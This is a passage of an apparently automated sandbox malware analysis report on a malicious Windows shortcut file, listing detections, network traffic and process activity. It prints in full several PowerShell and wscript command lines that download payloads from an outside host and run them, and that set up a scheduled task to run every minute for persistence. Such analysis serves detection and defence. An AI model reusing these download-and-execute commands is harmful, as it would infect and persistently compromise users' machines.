('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;, ProcessId: 5464, ProcessName: powershell.exe

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-03T09:15:01.128993+010028033053Unknown Traffic192.168.2.64971046.254.34.201443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Multi AV Scanner detection for submitted file
      Source: mX3IqRiuFo.lnkReversingLabs: Detection: 45%
      Source: mX3IqRiuFo.lnkVirustotal: Detection: 53%Perma Link
      AI detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
      Machine Learning detection for sample
      Source: mX3IqRiuFo.lnkJoe Sandbox ML: detected
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.6:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.6:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.6:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.6:49855 version: TLS 1.2

      Software Vulnerabilities

      barindex
      Suspicious execution chain found
      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1Host: www.italialife24.it
      Source: Joe Sandbox ViewIP Address: 46.254.34.201 46.254.34.201
      Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49710 -> 46.254.34.201:443
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1Host: www.italialife24.it
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.italialife24.itConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: www.italialife24.it
      Source: powershell.exe, 00000000.00000002.2195200172.00000199EC795000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
      Source: powershell.exe, 00000000.00000002.2169173026.00000199816BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2169173026.0000019981650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618B68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.00000152529EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDEFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://italialife24.it
      Source: powershell.exe, 00000000.00000002.2189643133.00000199901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2169173026.0000019981A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2189643133.000001999006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415007234.0000026627741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415007234.000002662760B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398207318.00000152615C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398207318.000001526148B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BE2E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2964143111.00000214CCACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2964143111.00000214CC987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000014.00000002.2833335947.00000214BE174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.2169173026.0000019980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026617591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015251411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BC921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000000.00000002.2169173026.0000019981757000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDF65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 00000014.00000002.2833335947.00000214BE174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.2169173026.00000199816BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2169173026.0000019981650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618B68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.00000152529EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDEFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.italialife24.it
      Source: powershell.exe, 00000000.00000002.2196342208.00000199ECAEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co)
      Source: powershell.exe, 00000000.00000002.2169173026.0000019980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026617591000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015251411000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BC921000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000014.00000002.2964143111.00000214CC987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000014.00000002.2964143111.00000214CC987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000014.00000002.2964143111.00000214CC987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000014.00000002.2833335947.00000214BE174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.2169173026.0000019981248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.000001525203C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BD54B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.2189643133.00000199901B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2169173026.0000019981A12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2189643133.000001999006E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618E67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415007234.0000026627741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2415007234.000002662760B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398207318.00000152615C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2398207318.000001526148B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BE2E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2964143111.00000214CCACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2964143111.00000214CC987000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.2169173026.0000019981757000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDF65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000000.00000002.2169173026.0000019981757000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252A57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDF65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
      Source: powershell.exe, 00000000.00000002.2169173026.0000019981699000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2169173026.0000019981248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2252312929.0000026618795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2245540270.0000015252752000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2833335947.00000214BDC60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it
      Source: powershell.exe, 00000014.00000002.2827426779.00000214BA8FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/
      Source: wscript.exe, 0000000B.00000002.2304624356.000001D583AC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2272407896.0000019E82FC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-c
      Source: wscript.exe, wscript.exe, 00000013.00000002.2782486876.0000015B0FC55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content
      Source: wscript.exe, 00000007.00000002.2210475240.0000020281BC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/0
      Source: wscript.exe, 00000013.00000002.2782486876.0000015B0FC55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/a
      Source: wscript.exe, 00000004.00000002.2185643040.000001EE7BEE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.ph
      Source: powershell.exe, 00000014.00000002.2833335947.00000214BC921000.00000004.00000800.00020000.00000000.sdmp, EB3Vk0QhrcN4wn.js.0.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
      Source: powershell.exe, 00000014.00000002.2979838151.00000214D4AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
      Source: powershell.exe, 00000000.00000002.2193096048.00000199EA6E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2196342208.00000199ECAEB000.00000004.00000020.00020000.00000000.sdmp, mX3IqRiuFo.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
      Source: powershell.exe, 00000000.00000002.2192952183.00000199EA665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
      Source: wscript.exe, 00000017.00000002.2856582097.0000020104925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.2854626485.00000201046CC000.00000004.00000020.00020000.00000000.sdmp, 241XU6KV2DFH.js.8.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
      Source: powershell.exe, 00000000.00000002.2193096048.00000199EA6E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2196342208.00000199ECAEB000.00000004.00000020.00020000.00000000.sdmp, mX3IqRiuFo.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
      Source: powershell.exe, 00000000.00000002.2195200172.00000199EC7C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.phpr
      Source: powershell.exe, 00000000.00000002.2192952183.00000199EA665000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
      Source: wscript.exe, 0000000B.00000002.2304624356.000001D583AC5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000D.00000002.2272407896.0000019E82FC5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/unt
      Source: wscript.exe, 00000017.00000002.2856582097.0000020104925000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.2854626485.00000201046CC000.00000004.00000020.00020000.00000000.sdmp, 241XU6KV2DFH.js.8.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.6:49709 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.6:49714 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.6:49715 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.6:49855 version: TLS 1.2

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: Process Memory Space: powershell.exe PID: 5464, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Windows Scripting host queries suspicious COM object (likely to drop second stage)
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
      Windows shortcut file (LNK) contains suspicious command line arguments
      Source: mX3IqRiuFo.lnkLNK file: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;
      Wscript starts Powershell (via cmd or directly)
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD34894C230_2_00007FFD34894C23
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3489495D0_2_00007FFD3489495D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD348925FA5_2_00007FFD348925FA
      Source: Process Memory Space: powershell.exe PID: 5464, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: classification engineClassification label: mal100.expl.evad.winLNK@28/13@1/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4832:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:672:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f45x0lb5.rzu.ps1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: mX3IqRiuFo.lnkReversingLabs: Detection: 45%
      Source: mX3IqRiuFo.lnkVirustotal: Detection: 53%
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $s9iJkyOlgfNn3 = New-Object Net.WebClient; $cio = $s9iJkyOlgfNn3.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $s9iJkyOlgfNn3.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'EB3Vk0QhrcN4wn.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('EB3Vk0QhrcN4wn.js ' * 2)) /tn HAoyOEGl0;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /f
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\241XU6KV2DFH.js
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\EB3Vk0QhrcN4wn.js EB3Vk0QhrcN4wn.js " /tn HAoyOEGl0Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\241XU6KV2DFH.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn EB3Vk0QhrcN4wn.js /f; wscript $env:programdata\241XU6KV2DFH.js "Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn EB3Vk0QhrcN4wn.js /fJump to behavior
